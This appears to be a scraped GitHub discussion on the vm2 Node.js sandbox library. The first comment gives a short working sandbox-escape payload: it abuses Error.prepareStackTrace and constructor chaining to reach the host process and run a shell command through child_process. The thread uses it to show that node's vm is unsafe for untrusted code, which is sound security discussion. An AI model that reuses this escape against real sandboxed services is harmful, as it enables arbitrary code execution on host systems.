Comments (3)
j4k0xb
commented on June 14, 2024
That's just the stock node vm 🤔
vm2 did a lot more to prevent escapes but it still wasn't enough
bypass:
Error.prepareStackTrace = (e, frames) => {
frames.constructor
.constructor("return process")()
.mainModule.require("child_process")
.execSync("touch flag");
};
throw new Error();from vm2.
j4k0xb
commented on June 14, 2024
Please don't rely on a few patches or node's vm in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)
That's why the readme says
Consider migrating your code to isolated-vm.
from vm2.
XmiliaH
commented on June 14, 2024
Your soulution does not help as @j4k0xb showed again and again. Stop asking here what problems your solution sill has. It has nothing to do with vm2. Move this discussion over to your own repo.
from vm2.
Related Issues (20)
- VM and NodeVM behaves differently on await HOT 3
- Any tips for improving performance of `vm.run()`? HOT 9
- [VM2 Sandbox Escape] Vulnerability in [email protected] HOT 13
- Sandbox Escape in [email protected] HOT 3
- Adding a Security Policy HOT 1
- Modules not loading any more? HOT 16
- Overriding functions of objects from sandbox parameter inside NodeVM HOT 3
- Accessing .buffer property on a Float32Array HOT 8
- Lib memory leak HOT 8
- Hello, is there any way to make the large functions in node equal to those in VM2? Or not isolate large functions? HOT 16
- Usage with NextJS HOT 8
- this.pathResolve is not a function in 3.9.18 HOT 2
- Work in a bundle HOT 3
- Use external modules without filesystem access HOT 1
- Typescript Set transpilation issues
- Node's test runner not available as builtin
- Isolating Imported Modules
- Discontinued HOT 63
- vm2 Sandbox Escape vulnerability (Github Dependabot Issue) HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from vm2.